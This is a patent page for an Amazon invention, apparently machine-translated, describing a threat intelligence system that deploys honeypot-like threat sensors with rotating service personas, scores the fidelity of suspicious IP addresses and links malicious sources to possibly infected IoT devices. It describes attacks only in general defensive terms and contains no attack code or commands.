Threat sensor deployment and management

By deploying threat sensors and analytics components on IoT devices and utilizing threat intelligence systems to collect and organize data, the problem of low reliability in malware detection on IoT devices is solved, enabling more efficient malware identification and security management.

CN115486031BActive Publication Date: 2025-10-28AMAZON TECH INC
View PDF 1 Cites 0 Cited by

Patent Information

Application Number
CN202180032078.X
Authority / Receiving Office
CN · China
Patent Type
Patents(China)
Current Assignee / Owner
Priority Date
2020-05-01
Filing Date
2021-04-16
Publication Date
2025-10-28
Estimated Expiration
2041-04-16

AI Technical Summary

Technical Problem

The reliability of malware infection detection in existing IoT devices is low, and there is a lack of sufficient data and computing resources, resulting in insufficient detection accuracy and efficiency. In particular, it is difficult to effectively utilize threat intelligence and behavioral patterns for accurate detection on IoT devices.

Method used

Deploy multiple threat sensors, determine deployment plans through threat sensor deployment and management components, collect data and adjust deployment strategies; distributed threat sensor data aggregation and data export components aggregate and calculate the salience scores of interaction sources; distributed threat sensor analysis and related components identify malicious actors, combine with threat intelligence systems to collect, organize and release technical indicators of malware and botnets, and use honeypots and threat data collectors to simulate real services to capture interaction data.

Benefits of technology

It improves the accuracy and efficiency of malware detection for IoT devices, reduces false alarm rates, enhances the ability to identify malicious activities, and ensures the security and stability of IoT devices.

✦ Generated by Eureka AI based on patent content.

Smart Images

  • Figure CN115486031B_ABST
    Figure CN115486031B_ABST
Patent Text Reader

Abstract

Various embodiments of devices and methods for deploying and managing threat sensors in a malware threat intelligence system are described. In some embodiments, the system includes multiple threat sensors deployed at different network addresses and physically located in different geographical areas within a provider network for detecting interactions from sources. In some embodiments, a threat sensor deployment and management service determines a deployment plan for the multiple threat sensors, including a deployment plan for a threat data collector associated with each threat sensor. The threat data collectors may be of different types, such as using different communication protocols or ports, or providing different types of responses to inbound communications. Different threat sensors may have different lifetimes. The service deploys the threat sensors based on the plan, collects data from the deployed threat sensors, adjusts the deployment plan based on the collected data and the lifetime of the threat sensors, and then performs the adjustments.
Need to check novelty before this filing date? Find Prior Art

Description

Background Art

[0001] The Internet of Things (“IoT”) is a term used to describe connecting computing devices scattered around the world within existing internet infrastructure. IoT devices can be embedded in a variety of products, such as home appliances, manufacturing equipment, printers, automobiles, thermostats, smart traffic lights, cameras, and more.

[0002] Most IoT devices lack the functionality to perform robust malware infection detection. However, even for IoT devices capable of malware infection detection, the reliability of such detection may not be as high as that of larger malware infection detection services on more powerful computing devices. For example, a malware infection detection service implemented by a service provider network or server computers may use hundreds of millions of parameters, while malware infection detection running on an IoT device may use only a few. Furthermore, the amount and type of data received by malware infection detection on a given IoT device may change over time. Over time, malware infection detection may lose accuracy and become less useful.

[0003] To obtain more threat intelligence, organizations implement honeypots to lure malicious actors. A honeypot is a computer security mechanism set up to detect, divert, or in some way resist attempts to use information systems without authorization. Typically, a honeypot consists of data that appears to be a legitimate part of a site (e.g., data within a web site), seemingly containing information or resources valuable to attackers, but is actually isolated and monitored to prevent or analyze attackers. Organizations implement different types of honeypots. Pure honeypots are fully operational production systems where attacker activity is monitored via bug taps installed on the link between the honeypot and the network. High-interaction honeypots simulate the activity of production systems hosting various services, thus potentially allowing attackers to waste their time using numerous services. High-interaction honeypots offer higher security due to their difficulty in detection but are expensive to maintain. Low-interaction honeypots only simulate services frequently requested by attackers. Because they consume relatively few resources, their complexity is reduced. Attached Figure Description

[0004] Figure 1 An example system environment of a threat intelligence system in a provider network according to some embodiments is shown. The threat intelligence system includes threat sensor deployment and management services, distributed threat sensor data aggregation and data export services, and distributed threat sensor analysis and related services. Multiple threat sensors are deployed in multiple geographic regions and communicate with multiple threat sensors in a client network, wherein one or more of the threat sensors interact with computing participants via the Internet.

[0005] Figure 2 Other aspects of an example system of threat sensor deployment and management components according to some embodiments are shown, wherein the threat sensor deployment and management service deploys and configures multiple threat sensors, each containing multiple different threat data collectors, wherein the threat data collectors receive inbound communications from multiple potential malicious actors.

[0006] Figure 3 Other aspects of an example system of a distributed threat sensor data aggregation and data export component according to some embodiments are shown, which receives sensor log streams from a data streaming service that receives data from multiple threat sensors, wherein the distributed threat sensor data aggregation and data export component aggregates the sensor logs into a table and then calculates saliency scores for each source that interacted with the threat sensors.

[0007] Figure 4 Other aspects of an example system of distributed threat sensor analysis and related components according to some embodiments are shown, which receives a salience score associated with the source of the interaction, identifies a malicious actor, then associates the malicious actor with known devices in the network to identify infected known devices, and then provides some kind of notification about the infected known devices.

[0008] Figure 5 An example system environment is shown as a part of a threat intelligence system according to some embodiments, wherein multiple threat sensors provide sensor logs to a sensor log acquisition / analysis service, the sensor log acquisition / analysis service provides threat intelligence tables to a threat intelligence export service, and the threat intelligence export service provides data to a threat intelligence related service, wherein the example system includes several other components and services.

[0009] Figure 6 The illustration depicts an instance provider network environment of a threat intelligence system according to some embodiments, wherein the threat intelligence system is partially implemented by event-driven computing services, object storage services, database services, and data streaming services, and wherein threat sensors and potential malicious actors are deployed by the computing instance services of the provider network.

[0010] Figure 7 This is a flowchart illustrating an illustrative method that can be implemented by a threat sensor deployment and management component according to some embodiments, wherein the threat sensor deployment and management component determines a deployment plan, deploys multiple threat sensors, collects threat data from the deployed threat sensors, determines an adjusted deployment plan, and performs the adjustment of the deployment plan.

[0011] Figure 8 This is a flowchart illustrating a method that can be implemented by a threat sensor and a selected threat data collector of the threat sensor according to some embodiments.

[0012] Figure 9 This is a flowchart of an illustrative method that can be implemented by a distributed threat sensor data aggregation and data derivation component according to some embodiments, wherein the distributed threat sensor data aggregation and data derivation component receives a sensor log stream containing information about interactions with threat sensors, aggregates the information in the sensor logs according to the source of the interaction, calculates a salience score for the source, and provides the salience score to other targets, wherein the salience score includes the likelihood that the source is involved in threat network communications.

[0013] Figure 10 This is a more detailed flowchart of an illustrative method, implemented by a distributed threat sensor data aggregation and data export component according to some embodiments, wherein the distributed threat sensor data aggregation and data export component receives a sensor log stream containing information about interactions with threat sensors, has access to additional information to modify the sensor logs, aggregates information from the sensor logs according to the source of the interaction, accesses historical data, calculates a salience score for the source, and exports the salience score and / or the sensor logs to one or more targets, wherein the salience score includes the likelihood that the source is involved in threat network communications.

[0014] Figure 11 This is a flowchart illustrating a method, according to some embodiments, for calculating a salience score of a source interacting with one or more threat sensors, which can be implemented by a distributed threat sensor data aggregation and data derivation component or a distributed threat sensor analysis and related component.

[0015] Figure 12 This is a flowchart of an illustrative method, implemented by distributed threat sensor analysis and related components, according to some embodiments, wherein the distributed threat sensor analysis and related components obtain saliency scores of different sources interacting with threat sensors, determine which sources are malicious actors based on the saliency scores, receive identifiers of known actors, such as servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network, and associate malicious actors with known actors to identify which known actors may be infected with malware.

[0016] Figure 13 This is a logic diagram of a threat sensor containing multiple different threat data collectors according to some embodiments, wherein the threat data collectors receive inbound communications from potential malicious actors, wherein low-interaction threat data collectors are designed to capture interactions on service ports via TCP and UDP as well as ICMP messages, and medium-interaction threat data collectors are used for Telnet, SSH and SSDP / UPnP.

[0017] Figure 14The diagram, based on some embodiments, illustrates the retrieval and storage of malware samples in a data storage area for further static and dynamic analysis regarding interactions between threat sensors and / or threat data collectors and external malware distribution points, wherein retrieved files are recursively acquired and analyzed for further outbound citations.

[0018] Figure 15 This is a block diagram of an edge device, such as an IoT device, according to some embodiments, which may be a known device matched with a potentially malicious device.

[0019] Figure 16 The block diagrams, based on some embodiments, illustrate example computer systems that can be used for threat intelligence services and / or threat sensor deployment and management components and / or distributed threat sensor data aggregation and data export components and / or distributed threat sensor analysis and related components.

[0020] Although embodiments have been described herein by way of example with respect to several embodiments and illustrative drawings, those skilled in the art will recognize that the embodiments are not limited to the described embodiments or drawings. It should be understood that the drawings and their detailed description are not intended to limit the embodiments to the specific forms disclosed, but rather, the invention is intended to cover all modifications, equivalents, and alternatives falling within the spirit and scope defined by the appended claims. The headings used herein are for organizational purposes only and are not intended to limit the scope of the description or the claims. As used throughout this application, the word “may” is used in an permissible sense (i.e., meaning possible) rather than a mandatory sense (i.e., meaning must). Similarly, the words “include,” “including,” and “includes” mean including but not limited to.

[0021] Furthermore, in the following sections, reference will now be made in detail to embodiments, examples of which are illustrated in the accompanying drawings. Numerous specific details are set forth in the following detailed description to provide a thorough understanding of this disclosure. However, it will be apparent to those skilled in the art that some embodiments may be practiced without these specific details. In other instances, well-known methods, procedures, components, circuits, and networks have not been described in detail so as not to unnecessarily obscure various aspects of the embodiments.

[0022] This specification contains references to "an embodiment" or "an embodiment". The appearance of the phrase "in one embodiment" or "in an embodiment" does not necessarily refer to the same embodiment. Specific features, structures, or characteristics may be combined in any suitable manner as disclosed in this disclosure.

[0023] "Comprising". This term is open-ended. As used in the appended claims, this term does not exclude additional structures or steps. Consider a claim stating: "An apparatus comprising one or more processor units...". Such a claim does not exclude the apparatus from including additional components (e.g., network interface unit, graphics circuitry, etc.).

[0024] "Configured as." Various units, circuits, or other components may be described or claimed to be "configured as" to perform one or more tasks. In this context, "configured as" is used to imply a structure by indicating that the unit / circuit / component contains a structure (e.g., a circuit system) that performs these tasks during operation. Thus, it can be said that the specified unit / circuit / component may be configured to perform a task even if it is not currently in operation (e.g., not turned on). Units / circuit / components used with the language "configured as" include hardware—e.g., circuits, memory storing program instructions that can be executed to perform operations, etc. Explicitly stating that a unit / circuit / component is "configured as" to perform one or more tasks is not intended to invoke 35 USC §112 paragraph 6 for the unit / circuit / component. Additionally, "configured as" may include a general structure (e.g., a general circuit system) manipulated by software and / or firmware (e.g., an FPGA or a general-purpose processor executing software) to operate in a manner capable of performing the relevant tasks. "Configured as" may also include adjusting manufacturing processes (e.g., a semiconductor manufacturing facility) to manufacture means (e.g., an integrated circuit) suitable for performing or implementing one or more tasks.

[0025] "Based on." As used herein, this term describes one or more factors that influence a determination. This term does not exclude additional factors that may influence the determination. That is, a determination may be based entirely on these factors, or at least partially on them. Consider the phrase "A is determined based on B." In this case, B is a factor influencing the determination of A, and such a phrase does not exclude the possibility that the determination of A is also based on C. In other cases, A may be determined solely based on B.

[0026] It will also be understood that although the terms first, second, etc., may be used in this document to describe individual components, these components should not be limited by these terms. These terms are used only to distinguish one component from another. For example, a first contact may be called a second contact, and similarly, a second contact may be called a first contact, without deviating from the intended scope. Both first and second contacts are contacts, but they are not the same contact. As used herein, these terms serve as labels for the nouns that follow them and do not imply any kind of ordering (e.g., spatial, temporal, logical, etc.). For example, a buffer circuit may be described herein as performing write operations on “first” and “second” values. The terms “first” and “second” do not necessarily mean that the first value must be written before the second value.

[0027] The terminology used in this description is for the purpose of describing particular embodiments only and is not intended to be limiting. As used in the specification and appended claims, the singular forms “a / an” and “the” are intended to include the plural forms as well, unless the context clearly indicates otherwise. It should also be understood that the term “and / or” as used herein refers to and includes any and all possible combinations of one or more associated listed items. It should be further understood that when the terms “includes / including” or “comprises / comprising” are used in this specification, the presence of the stated feature, integer, step, operation, element, and / or component is specified, but the presence or addition of one or more other features, integers, steps, operations, elements, components, and / or groups thereof is not excluded.

[0028] As used herein, depending on the context, the term "if" can be interpreted as "when," "after," "in response to determination," or "in response to detection." Similarly, depending on the context, the phrase "if determination" or "if [the condition or event] is detected" can be interpreted as "immediately after determination," "in response to determination," "immediately after [the condition or event] is detected," or "in response to the detection of [the condition or event]." Detailed Implementation

[0029] The systems and methods described herein implement a malware threat intelligence system, which in some embodiments can be used to detect threats in various types of environments. In some embodiments, the malware threat intelligence system is designed to collect, organize, and publish technical indicators of malware and / or botnets targeting provider networks, client networks, or IoT devices or networks. Therefore, the malware threat intelligence system disclosed herein is not limited to edge devices or IoT devices but can be used more broadly. In some embodiments, this system includes multiple threat sensors deployed at different network addresses and physically located in different geographical areas within the provider network to detect interactions from sources. In some embodiments, the malware threat intelligence system may include three separate components: a threat sensor deployment and management component, a distributed threat sensor data aggregation and data export component, and a distributed threat sensor analysis and related services. Not all three components are required. A system may contain only one or two of these components. In addition to these components, the system may also contain other components. The system may contain components that include the functionality of the multiple components listed herein in different component configurations. For example, the system may combine certain functionalities of two of these components into one component. There are many different types of malware threat intelligence systems in various different embodiments, and the specific component details listed herein should not be considered limiting.

[0030] In some embodiments, a malware threat intelligence system may include a threat sensor deployment and management component. For example, the threat sensor deployment and management component may implement a malware threat intelligence system service for a provider network. In some embodiments, the threat sensor deployment and management component may determine a deployment plan for the plurality of threat sensors, including a deployment plan for threat data collectors associated with the threat sensors. Different types of threat data collectors may exist. Different threat sensors may include different numbers and types of threat data collectors. Threat data collectors may use different communication protocols or ports, or provide different types of responses to inbound communications. Different threat sensors may also have different lifetimes. In some embodiments, the threat sensor deployment and management component may deploy threat sensors based on a deployment plan, collect data from deployed threat sensors, adjust the deployment plan based on the collected data and threat sensor lifetimes, and perform adjustments.

[0031] In some embodiments, a malware threat intelligence system may include a distributed threat sensor data aggregation and data export component. For example, the distributed threat sensor data aggregation and data export component may be implemented as a service of a malware threat intelligence system for a provider network. In some embodiments, the distributed threat sensor data aggregation and data export component receives sensor log streams from a plurality of threat sensors. In some embodiments, the sensor log streams may contain information about interactions with the threat sensors, including identifiers of the sources of the interactions. In some embodiments, the distributed threat sensor data aggregation and data export component may aggregate information from the sensor logs based on the sources and calculate a salience score for the sources. For example, the salience score quantifies the likelihood that the source is involved in threat network communications. In some embodiments, the distributed threat sensor data aggregation and data export component may provide the salience score to other targets.

[0032] In some embodiments, a malware threat intelligence system may include distributed threat sensor analysis and correlation components. For example, the distributed threat sensor analysis and correlation components may be implemented as a service of a malware threat intelligence system for a provider network. In some embodiments, the distributed threat sensor analysis and correlation components obtain saliency scores for different sources interacting with the plurality of threat sensors. In some embodiments, the distributed threat sensor analysis and correlation components may determine which sources are malicious actors based on the saliency scores. In some embodiments, the components may receive identifiers of known actors, such as servers in a provider network, computing instances in a provider network, client devices in a client network, or IoT devices deployed in a remote network. In some embodiments of these embodiments, the distributed threat sensor analysis and correlation components may correlate malicious actors with known actors to identify which known actors may be infected with malware.

[0033] IoT devices

[0034] In some embodiments, the Internet of Things (“IoT”) is a system of interconnected computing devices, mechanical and digital machines, objects, animals, or people, each with a unique identifier (UID) and capable of transmitting data over a network without human-to-human or human-to-computer interaction. In consumer market embodiments, IoT technology is most synonymous with products associated with the concept of “smart home,” encompassing devices and appliances (such as lighting fixtures, thermostats, home security systems and cameras, and other household appliances) that support one or more shared ecosystems and can be controlled via devices associated with said ecosystems, such as smartphones and smart speakers. In commercial environment embodiments, IoT technology can be applied to fields such as healthcare, transportation, vehicle communication systems, building and home automation. For example, the Internet of Things for Healthcare (“IoMT”) can be applied to medical and health-related purposes, data collection and analysis research, and monitoring. IoMT can create a digital healthcare system connecting available medical resources and services. For example, in transportation, IoT can help integrate communication, control, and information processing between various transportation systems. As another example, in vehicle communication systems, vehicle-to-vehicle (V2V), vehicle-to-infrastructure (V2I), vehicle-to-pedestrian (V2P), and vehicle-to-everything (V2X) communication are IoT technologies and represent the first steps towards achieving autonomous driving and connected road infrastructure. As another example, in building and home automation, IoT devices can be used to monitor and control mechanical, electrical, and electronic systems used in various types of buildings (e.g., public and private, industrial, institutional, or residential) within home and building automation systems. For instance, in industrial environments, industrial IoT devices can acquire and analyze data from connected equipment, operational technology (“OT”), locations, and personnel. The combination of industrial IoT with operational technology monitoring devices helps in the supervision and monitoring of industrial systems. In infrastructure embodiments, monitoring and controlling the operation of sustainable urban and rural infrastructure, such as bridges, railway tracks, and onshore and offshore wind farms, is a key application of IoT. In military environments, the Internet of Things for Military Use (“IoMT”) is the application of IoT technology in the military field for reconnaissance, surveillance, and other operationally relevant targets. The above are just some examples of various types of IoT devices and are not an exhaustive list of all IoT devices, and are therefore not intended to be restrictive.

[0035] For many different IoT applications, many IoT deployments consist of hundreds of thousands to millions of devices, making it crucial to track, monitor, and manage connected device groups. Connected devices constantly communicate with each other and with the management network using different types of wireless communication protocols. While communication creates responsive IoT applications, it can also expose IoT security vulnerabilities and open channels for malicious actors or accidental data breaches. To protect users, devices, and companies, IoT devices must be protected. The foundation of IoT security lies in the control, management, and setup of connections between devices. Proper protection helps maintain data privacy, restricts access to device and cloud resources, provides secure methods for connecting to the cloud, and audits device usage. IoT security strategies mitigate vulnerabilities through the use of techniques such as device identity management, encryption, and access control. Therefore, any organization deploying IoT devices needs to ensure that these devices function properly and securely after deployment. Such organizations may also need to ensure secure access to IoT devices, monitor their health, detect and remotely troubleshoot problems, and manage software and firmware updates.

[0036] IoT device management and security

[0037] In some embodiments, to address these and other issues, provider networks can provide IoT device management. Provider network IoT device management makes it easy to securely register, organize, monitor, and remotely manage IoT devices at scale. Provider network IoT device management allows organizations deploying IoT devices to register connected devices individually or in batches and manage permissions to ensure device security. Using provider networks, organizations deploying IoT devices can also organize their devices, monitor and troubleshoot device malfunctions, query the status of any IoT device in their device group, and send firmware updates via over-the-air (“OTA”). Provider network IoT device management may be device-type and OS-agnostic, so organizations can use the same services to manage all their deployed IoT devices, such as restricted microcontrollers or connected cars. Provider network IoT device management allows organizations deploying IoT devices to scale their device groups and reduce the cost and effort of managing large and diverse IoT device deployments.

[0038] In some embodiments, as part of an IoT device management service, a provider network can offer a service to help organizations deploying IoT devices secure their IoT device portfolios. For example, a security vulnerability can be a weakness that can be exploited to compromise the integrity or availability of IoT applications. IoT devices are inherently vulnerable. IoT portfolios consist of devices with different functionalities, long lifespans, and geographically dispersed locations. These characteristics, combined with the ever-increasing number of devices, raise questions about how to address the security risks posed by IoT devices. Even if an organization has implemented security best practices, new attack vectors are constantly emerging. To detect and mitigate vulnerabilities, organizations need to continuously audit device settings and health status.

[0039] Further exacerbating security risks is the limited computing, memory, and storage capabilities of many devices, restricting opportunities for implementing security on the device itself. IoT devices lack the same visibility as other types of devices such as servers, virtual instances, and desktop computers. For most other types of devices, the data collected from them is abundant. This richness of data allows for a high degree of confidence and accuracy in identifying and inferring infection types. Malware detection on these other devices can utilize this rich data, such as specific patterns in network traffic or specific bytes in memory, to identify specific types of viruses. However, for IoT devices, many of these types of signals or indicators are unavailable or impossible to collect due to all the limitations surrounding them. For example, some IoT devices cannot monitor memory at all, or cannot monitor memory as frequently as needed. As another example, some IoT devices lack the computing or networking capabilities to monitor network activity for deep packet inspection.

[0040] Malware infection detection methods

[0041] In some embodiments, at least two common detection methods exist for detecting infected devices: threat intelligence and behavioral patterns. In some embodiments, threat intelligence uses known indicators of specific malware, such as dropped file hashes or content-specific signatures, and connections to the command and control server (“C&C”) of a botnet, to identify a device infected with that malware. These indicators are typically obtained from threat intelligence sources that actively track malware and botnets and publish their indicators as threat intelligence feeds. In some embodiments, behavioral patterns use observed behavioral patterns consistent with various stages of device infection, such as reconnaissance, penetration, persistence, and abuse, to identify an infected device.

[0042] The quality of threat intelligence sources can vary depending on their collection strategies (i.e., using honeypots, malware detonation, manual reverse engineering) and implementation details (i.e., algorithms for extracting network locations associated with botnets from dropped malware or interactions with honeypots). Blindly trusting the quality of threat intelligence sources without relying on these quality factors can degrade the quality of device infection detection using threat intelligence. The type of threat intelligence source must be considered to be effective in identifying infected devices. For example, when using malicious IP address sources, inbound connections from malicious IP addresses should be distinguished from outbound connections to malicious IP addresses. Inbound connections from malicious IP addresses to devices can indicate any of the following: a) a connection from a botnet controller to a backdoor installed on the device; b) a connection from another infected device used to download a malicious payload hosted on the device; or c) a connection attempting to infect the device (i.e., a large-scale random internet-wide scan). Therefore, for all these possibilities of inbound connections, it is impossible to determine if the device has been infected without examining other evidence. In contrast, outbound connections from devices to malicious IP addresses can be less vaguely attributed to connections to botnet C&C or payload distribution hosts. The completeness and timeliness of threat intelligence sources vary depending on the source. For example, a single threat intelligence source may be unable to track a specific type of botnet (i.e., due to a lack of infrastructure required to attract and reach botnets), or may delay the release of metrics (i.e., because the manual process of reviewing sources before release is slow). Therefore, threat intelligence sources should be selected based on their ability to track IoT-specific malware and botnets. Additionally, the possibility that not all relevant IoT malware and botnet metrics can be received from threat intelligence sources and / or the quality of released metrics may be inconsistent should also be considered.

[0043] Using behavioral patterns, individual behavioral patterns commonly seen in infected devices can be highly similar to those of legitimate devices. For example, consider a scenario where an infected device is abused to launch a large-scale denial-of-service attack such as a TCP SYN flood. Looking at TCP traffic spikes in isolation, and independently of factors such as the shape of network traffic, packet content, and destination, or considering the device's historical traffic patterns, legitimate sensing data uploaded to its cloud storage might produce similar network traffic spikes. Therefore, we may often need to increase the types of behavioral signals / indicators and their associated information to eliminate ambiguity between legitimate and illegitimate device behavior. Due to a lack of visibility of more behavioral signals / indicators (i.e., the impossibility of performing deep packet inspections on the device) or due to poor signal quality (i.e., the direction of open connections on the device is unknown), we may have to rely on heuristics (i.e., guessing the direction of open connections on the device based on the device's local and remote port numbers, or based on known open ports on the device, combined with local and remote open connection ports) to address deficiencies in the quantity and quality of behavioral signals / indicators collected from the device. Infected devices typically exhibit more than one behavioral pattern common to infected devices over a period of time. In contrast, the likelihood of a device's legitimate behavior patterns overlapping with multiple common behavior patterns of an infected device is relatively small. For example, a typical infected device may exhibit all of the following behavior patterns in the same time window or across multiple adjacent time windows: regular connections to C&C servers, using randomly generated or selected IP addresses to probe other devices for malware propagation, opening unusual ports, communicating via unusual protocols / ports, and performing TCP SYN flood denial-of-service attacks against the victim target.

[0044] Detecting malicious activities

[0045] There are two or three advanced methods for detecting malicious activity on a device in the form of infiltration or any security breach. The first method is to collect and observe the signatures of this malicious activity. For example, signatures could include knowing which ports are being opened for a specific malicious activity, which files are being downloaded for that activity, and which IP addresses the infected device is attempting to connect to for that activity. By identifying these signatures, when these activities are observed, it becomes clear that malicious activity has occurred or is occurring, and what specific malicious activity it is. Signatures can identify malicious activity. The second method is known behavioral patterns. For example, for malicious cryptocurrency mining on an infected device, the malicious activity will install software that significantly increases the device's CPU and memory usage. Activity patterns can be defined and detected to determine if a device is infected with malware. The third method is anomaly detection, such as behavioral anomaly detection, used to detect whether a device is infected with malware or is typically a victim of unauthorized access.

[0046] For signature-based methods used to detect malicious activity on a device, the signatures must originate from somewhere. The signatures of specific malware must be collected from somewhere, such as the hash code of malicious files uploaded to the device for a specific attack. This collected information is what we call threat intelligence, detailed earlier.

[0047] There are different methods for gathering threat intelligence. One method is from honeypot phones. A honeypot is a fake system that pretends to be real to lure the actors behind malware distribution. Once they are lured in, the malicious actors become increasingly involved, revealing their activities and what they intend to do with the device. When a honeypot collects data, an engine behind it analyzes the activity to determine characteristics. For example, a honeypot might receive an HTTP GET request with a specific payload. The backend must then extract bits and pieces of the payload and put them together. For example, the backend system might analyze the source IP address, reverse domain lookup, or geographic location, or the source network of the malicious activity, or the content of the payload itself, to determine characteristics. The payload content might point to another location where additional material about security vulnerabilities will be downloaded. The engine behind the honeypot must extract this kind of information from the payload.

[0048] Threat Intelligence System

[0049] In some embodiments, the threat intelligence system disclosed herein is designed to collect, compile, and publish technical indicators of malware and botnets targeting provider networks, client networks, or IoT devices or networks. In some of these embodiments, the threat intelligence system strives to publish high-fidelity indicators to reduce the likelihood of false positives from customers. However, it must be emphasized that threat intelligence and published threat indicators only provide optimal results when used in conjunction with other security data sources and analytical methods. Threat indicators must be used based on their type (i.e., IP address, domain name, URL, process and filename, user agent), context (i.e., network protocol, target service, observation and activity schedule), and collection and management methods (i.e., honeypot interaction level, fidelity scoring formula, data retention, and weighting strategies). Misusing threat indicators with flawed assumptions and unrealistic expectations, while ignoring their type, context, and collection and management methods, will result in false positives.

[0050] The primary focus of a threat intelligence system is collecting threat intelligence, such as threat intelligence related to provider networks, client networks, or IoT devices or networks. However, the sensors in a threat intelligence system also typically extract threat indicators from general malware and botnets. These threat indicators are still being published because they help track multi-purpose malware targeting both IoT and general computing devices. In fact, threat intelligence systems offer multiple options for configuring sensors to attract malware targeting a specific platform.

[0051] When deploying and running multiple threat sensors, scalability issues can arise. Threat sensors and associated threat data collectors must be managed in a way that protects their integrity while collecting as much information as possible. However, if only one type of threat data collector is assigned to a single threat sensor, then the threat sensor will only collect that specific type of intelligence against a specific type of target. For example, a very simple threat data collector can be implemented on a single server or a single threat sensor and can emulate widely used protocols. For instance, a simple threat data collector might emulate some form of HTTP server, such as a Tomcat server. Therefore, this threat sensor will only collect information related to a specific version of the HTTP server it runs on and will only attract potential malicious actors targeting that version of the HTTP server. However, an effective threat intelligence system should compress as much content as possible from each assigned server or threat sensor.

[0052] In some embodiments, the malware threat intelligence system disclosed herein can set up threat sensors and associated threat data collectors, collect information from interactions with the threat data collectors, and organize the information into a format that a security system can use to detect whether a device is infected. For example, this organized information may be in the form of a signature. In some embodiments, the malware threat intelligence system disclosed herein provides a unique method for implementing, designing, and managing a collection of threat sensors and associated threat data collectors. In some embodiments, a honeypot is an instance of a threat data collector.

[0053] The threat sensors of the threat intelligence system are not publicly released, therefore, in some embodiments, any interaction with them is suspicious. In some embodiments, each threat sensor is designed to capture any interaction on all service ports via TCP and UDP, as well as ICMP messages. In some embodiments, in the case of TCP interaction, the sensor completes a handshake and can then capture up to 10KB of network payload before closing the connection. In some embodiments, in TLS interaction via TCP, the sensor may be configured to complete a TLS handshake to access suspicious payloads in plaintext. In some embodiments, for UDP and ICMP interaction, the threat sensors of the threat intelligence system may capture up to 10KB of network payload on received messages. In some embodiments, these payloads may have threat intelligence value because they typically also contain other threat indicators, such as links to malware distribution points and information about threat actors and attack vectors.

[0054] In some embodiments, in addition to these low-interaction threat data collectors, the threat sensors of a threat intelligence system may also be equipped with medium-interaction threat data collectors for Telnet, SSH, SSDP / UPnP, Hadoop, Redis, Docker, Android DebugBridge, HiSilicon DVR, Kguard DVR, MQTT, and HTTP proxies. In some embodiments, these threat data collectors emulate the functionality of their corresponding real services, guiding the interaction of suspicious objects to reveal more information, such as malware samples and the network location of reporting and command and control servers. In some of these embodiments, emulation methods, such as using fake shells, ensure the integrity of the sensor itself is protected and that suspicious objects cannot tamper with its operation.

[0055] In some embodiments, suspicious object interaction data collected by threat sensors is processed through a pipeline to augment, aggregate, organize, and generate actionable threat intelligence outputs for use as a subset of factors in making security decisions. In some embodiments, many threat indicators, such as IP addresses, may be too volatile to trigger security alerts independently of other forms of security analysis. Therefore, in some embodiments, the threat intelligence system may periodically derive IP reputation data as one of its threat indicator outputs.

[0056] In some embodiments, IP reputation data may include a calculated score for each IP address to indicate its fidelity, in order to reduce false positives due to dynamic IP address reassignment or suspicious objects operating behind large network proxies. In some embodiments, to calculate the fidelity score for each IP address, the threat intelligence system may use factors such as historical time-series tracking and the freshness of suspicious object activity, the number of sensors and network protocol types with which the suspicious object interacts, and the observed direction of connections to the suspicious object's network. For example, in some embodiments, an IP address may receive a high fidelity score if it has been frequently observed over the past three days, interacted with multiple threat sensors, completed TCP handshakes (and therefore without source IP spoofing), and been cited as a callback network point for actively distributing malware binaries. In some embodiments, the fidelity of each suspicious IP address is calculated over a specific point in time, and it evolves based on its most recent activity patterns and a time decay factor.

[0057] In some embodiments, in addition to IP reputation data, the threat intelligence system may also maintain metadata and payloads generated from interactions between suspicious objects and the system's threat data collector in the data storage area, and these can be accessed via a database for manual and automated threat knowledge extraction, such as threat trend analysis and extended threat indicator identification. In some embodiments, for interactions between suspicious objects and external malware distribution points, the threat intelligence system may retrieve malware samples and store them in the data storage area for further static and dynamic analysis.

[0058] Threat sensors and threat data collectors

[0059] In some embodiments, the malware threat intelligence system disclosed herein may deploy multiple threat data collectors within a given threat sensor. In some embodiments, this deployment of multiple threat data collectors within a given threat sensor may be performed through a threat sensor deployment and management service or component. In some embodiments, a honeypot is an instance of a threat data collector. In some embodiments, the malware threat intelligence system or threat sensor deployment and management component may set up several medium-interaction threat data collectors and several low-interaction threat data collectors within a single threat sensor. For example, the threat sensor deployment and management component may include 17 or 18 medium-interaction threat data collectors and 3 low-interaction threat data collectors in a single threat sensor.

[0060] The level of interaction of a threat data collector refers to the degree of contact between the threat data collector and the actors it interacts with. For example, if a TCP packet is received from an actor located at the source, the threat data collector may either simply send back the TCP packet or "escalate" to an application-level protocol and send, for example, an HTTP packet. As another example, if a TCP packet is received on a telnet port, the threat data collector may either initiate a telnet session or simply send back a TCP packet to close the session after capturing the payload of the TCP request. In this example, a medium-interaction threat data collector would initiate a telnet session, while a low-interaction threat data collector would simply send back a TCP packet to close the session after capturing the payload of the TCP request.

[0061] Multiple threat data collectors can be configured on a threat sensor. For simplicity, the first example discussed will assume the existence of only one threat sensor; the specification will then discuss expanding the threat sensor to multiple or a group of threat sensors later. When a threat sensor is deployed and / or configured, it receives its associated "personality" over a specified amount of time. In some embodiments, the threat sensor will be deployed and / or configured with a specific number of threat data collectors, each with a specific type of characteristic. In some of these embodiments, each threat data collector will differ from any other threat data collector in the threat sensor.

[0062] In some embodiments, the threat data collector of a threat sensor will only have a specific characteristic for a specific amount of time before one or more threat data collectors of the threat sensor are changed to different characteristics. In one embodiment, the specific amount of time may be 10 minutes. For example, a specific characteristic might be a response banner, such as an HTTP response banner. In some embodiments, the response to an HTTP request can be retrieved from a banner pool. After the specific amount of time has elapsed, the threat data collector may rotate to display a banner in response to the request. For example, after 10 minutes, the threat data collector may start providing new HTTP response banners in response to HTTP requests. The specific amount of time may be a defined or predefined amount of time, or it may be a random, unknown, or variable amount of time, depending on the embodiment. As another example, for a telnet session, the threat data collector may rotate to display a banner for the telnet session after a specific amount of time.

[0063] Additionally, similar to banners, other specific characteristics may change or rotate after a certain amount of time. In some embodiments, the information presented in response to a command may change after a certain amount of time. For example, different types of platforms may be presented to participants in response to a command. More specifically, a threat data collector might provide information about a specific type of Unix system in response to the "uname" command in a telnet session within a certain amount of time, but subsequently, the threat data collector might provide information about a Windows system or a different type of Unix system in response to the same command in a subsequent certain amount of time. Thus, in some embodiments, the threat data collector can pretend to be a different type of system, thereby increasing the likelihood of collecting more data from participants who are only targeting a specific type of system. Other specific characteristics that a threat data collector may change after a certain amount of time are the files listed in response to the list files command. Essentially, a threat data collector can change the characteristics it displays after a certain amount of time to attract more and / or different participants targeting different types of systems.

